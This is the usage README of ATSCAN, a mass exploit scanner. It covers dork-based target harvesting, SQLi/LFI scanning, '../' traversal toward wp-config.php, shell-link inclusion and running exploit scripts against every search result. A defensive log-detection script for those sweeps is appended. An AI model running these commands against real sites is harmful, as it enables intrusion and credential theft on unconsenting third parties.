ATSCAN - Advanced Search & Mass Exploit Scanner

ATSCAN is an advanced search & mass exploit scanner written in Perl.

Features:

  • Search engine Google / Bing / Ask / Yandex / Sogou 
  • Mass Dork Search
  • Multiple instant scans. 
  • Mass Exploitation 
  • Use proxy. 
  • Random user agent. 
  • Random engine.
  • External command execution.
  • XSS / SQLI / LFI / AFD scanner.
  • Filter WordPress and Joomla sites. 
  • Find Admin page.
  • Decode / Encode Base64 / MD5
  • Ports scan. 
  • Collect IPs
  • Collect E-mails. 
  • Auto-detect errors. 
  • Auto-detect CMS.
  • Post data.
  • Auto sequence repeater.
  • Validation.
  • Post and Get method
  • Interactive and Normal interface.
  • And more...

Libraries to install:

  • Perl Required. 
  • Works on all platforms. Available in BlackArch Linux and Dracos systems.

Permissions:

cd ATSCAN
chmod +x ./atscan.pl

Installation:

chmod +x ./install.sh
./install.sh

Execution:

Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan

Uninstall Tool:

atscan --uninstall

Commands:

 --help / -h     Help.
 --proxy         Set Tor proxy for scans [EX: --proxy "socks://localhost:9050"]
                 Set proxy [EX: --proxy "http://12.45.44.2:8080"]
                 Set proxy list [EX: --proxy list.txt]
 --motor / -m    Set search engines (default: Bing) EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
 --proxy-random  Random proxy [EX: --proxy-random list.txt or --proxy-random "socks://localhost:9050"]
 --m-random      Random choice among all available engines
 --b-random      Random choice among all available user agents
 --freq          Random time frequency (in seconds)
 --time          Set browser timeout
 --dork / -d     Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
 --target / -t   Target
 --level / -l    Scan level (+- Number of page results to scan)
 --zone          Search engine country.
 --param / -p    Set test parameter EX: id,cat,product_ID
 --save / -s     Output.
 --source        HTML output file
 --content       Print request content
 --data          Post and Get forms. See examples
 --post          Use POST method
 --get           Use GET method
 --header        Set headers
 --host          Domain name [Ex: site.com]
 --nobanner      Hide tool banner
 --beep          Produce beep sound if positive scan found.
 --ifend         Produce beep sound when scan process is finished.
 --noinfo        Skip extra results info.
 --ping          Host ping.
 --limit         Limit max positive scan results.
 --valid / -v    Validate by string
 --status        Validate by HTTP header status
 --ifinurl       Get targets with exact string matching
 --sregex        Get targets with exact regex matching
 --none          Get negative validation or engine regex matching
 --notin         Get targets where string doesn't exist in HTML
 --unique        Get targets with exact dork matching
 --replace       Replace exact string
 --replaceFROM   Replace from string to the end of target
 --payload       Use your own payloads instead of tool ones
 --exp / -e      Exploit/Payload will be added to full target
 --expHost       Exploit will be added to the host
 --expIp         Exploit will be added to the host IP
 --sql           Xss scan
 --lfi           Local file inclusion
 --joomrfi       Scan for Joomla local file inclusion.
 --shell         Shell link [Ex: http://www.site.com/shell.txt]
 --wpafd         Scan WordPress sites for arbitrary file download
 --admin         Get site admin page
 --shost         Get site subdomains
 --tcp           TCP port
 --udp           UDP port
 --index         Get target engine index
 --wp            WordPress sites in the server
 --joom          Joomla sites in the server
 --upload        Get upload files
 --zip           Get zip files
 --md5           Convert to MD5
 --encode64      Encode base64 string
 --decode64      Decode base64 string
 --TARGET        Will be replaced by target in external command
 --HOST          Will be replaced by host in external command
 --HOSTIP        Will be replaced by host IP in external command
 --PORT          Will be replaced by open port in external command
 --ip            Crawl to get IPs
 --regex         Crawl to get strings matching regex
 --noquery       Remove string value from query URL [ex: site.com/index.php?id=string]
 --command / -c  External command to execute
 --email         Get emails
 rang(x-y)       EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
                 site.com/index.php?id=1 -> 9.
 repeat(txt-y)   EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
                 In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
 [OTHER]         To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
 [DATA/DATAFILE] To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
 --update        Update tool
 --tool / -?     Tool info.
 --config        User configuration.
 --interactive   Interactive mode interface.
 --uninstall     Uninstall tool.
 

Examples:

  • PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080 
or --proxy list.txt Ex: --proxy my_proxies.txt 

  • RANDOM:
Random proxy: --proxy-random [proxy list.txt] 
Random browser: --b-random 
Random engine: --m-random 

  • SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 
atscan -t target --data "name:userfile[DATAFILE]value:file.txt" --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 

  • SEARCH ENGINE:
Search: atscan --dork [dork] --level [level] 
Search: atscan -d [dork] -l [level] 
Set engine: atscan --dork [dork] --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] 
Set selective engines: atscan -d [dork] -l [level] -m 1,2,3.. 
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3 --level [level] 
Search and rand: atscan -d [dork] -l [level] --expHost "/index.php?id=rang(1-9)" --sql 
Get target engine index: atscan -t [target] --level [value] --index 
Get Server wordpress sites: atscan -t [target] --wp 
Search + output: atscan --dork [dorks.txt] --level [level] --save 
Search + get emails: atscan -d [dorks.txt] -l [level] --email 
Search + get site emails: atscan --dork site:site.com --level [level] --email 
Search + get ips: atscan --dork [dork] --level [level] --ip 

  • REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork] / -t [target]] --level [level] --regex [regex] 
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) 
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})' 

  • REPEATER:
atscan -t site.com/index.php?id=rang(1-10) --sql 
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql 
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php" 

  • PORTS:
atscan -t [ip] --port [port] [--udp / --tcp] 
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] 
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

  • ENCODE / DECODE:
Generate MD5: --md5 [string] 
Encode base64: --encode64 [string] 
Decode base64: --decode64 [string] 

  • DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get] 

  • EXTERNAL COMMANDS:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" 
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST" 
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP" 
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET" 

  • MULTIPLE SCANS:
atscan --dork [dork] --level [10] --sql --lfi --wp ..
atscan --dork [dork] --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...] 

  • USER PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

  • SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --status [code] --none (Positive when status doesn't match)
atscan -d [dork / dorks.txt] -l [level] --status [code] / -v [string] / --ifinurl [string] / --sregex [regex] --none
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] 
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --unique 

  • SCAN VALIDATION:
atscan -t [target / targets.txt] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string] 
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] 
atscan -t [target / targets.txt] --valid [string] --notin [string]

  • UPDATE TOOL:
atscan --update 
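
Detection example for the rang() and repeat() sequences described above (added here for defenders; not part of ATSCAN or its documentation). It scans access-log lines for one client sweeping a single parameter through consecutive integers or through increasing ../ depth. The log layout (common log format), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')
TRAVERSAL_RE = re.compile(r'^((?:\.\./)+)(.+)$')

def _line(ip, target):
    # Helper that builds one constructed access-log line (not real traffic).
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "/index.php?id=" + "../" * d + "wp-config.php") for d in range(1, 5)]
    + [_line("198.51.100.9", f"/index.php?id={n}") for n in range(1, 6)]
    + [_line("192.0.2.10", "/index.php?id=42"), _line("192.0.2.10", "/about")]
)

def longest_run(values):
    """Length of the longest run of consecutive integers in a set."""
    best = 0
    for v in values:
        if v - 1 not in values:          # v starts a run
            n = 1
            while v + n in values:
                n += 1
            best = max(best, n)
    return best

def detect_repeaters(log_text, min_steps=3):
    """Flag clients that sweep one parameter by ../ depth or by consecutive integers."""
    depths = defaultdict(set)    # (ip, path, param, file) -> distinct ../ depths seen
    numbers = defaultdict(set)   # (ip, path, param) -> distinct integer values seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), urlsplit(m.group(2))
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            t = TRAVERSAL_RE.match(value)
            if t:
                depths[(ip, url.path, param, t.group(2))].add(len(t.group(1)) // 3)
            elif value.isdecimal():
                numbers[(ip, url.path, param)].add(int(value))
    findings = [("traversal-depth-sweep", ip, path, param, name, max(seen))
                for (ip, path, param, name), seen in depths.items() if len(seen) >= min_steps]
    findings += [("sequential-id-sweep", ip, path, param, "", longest_run(seen))
                 for (ip, path, param), seen in numbers.items() if longest_run(seen) >= min_steps]
    return sorted(findings)
```

Calling detect_repeaters(SAMPLE_LOG) returns one finding per sweeping client; raise min_steps to reduce noise from ordinary pagination.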

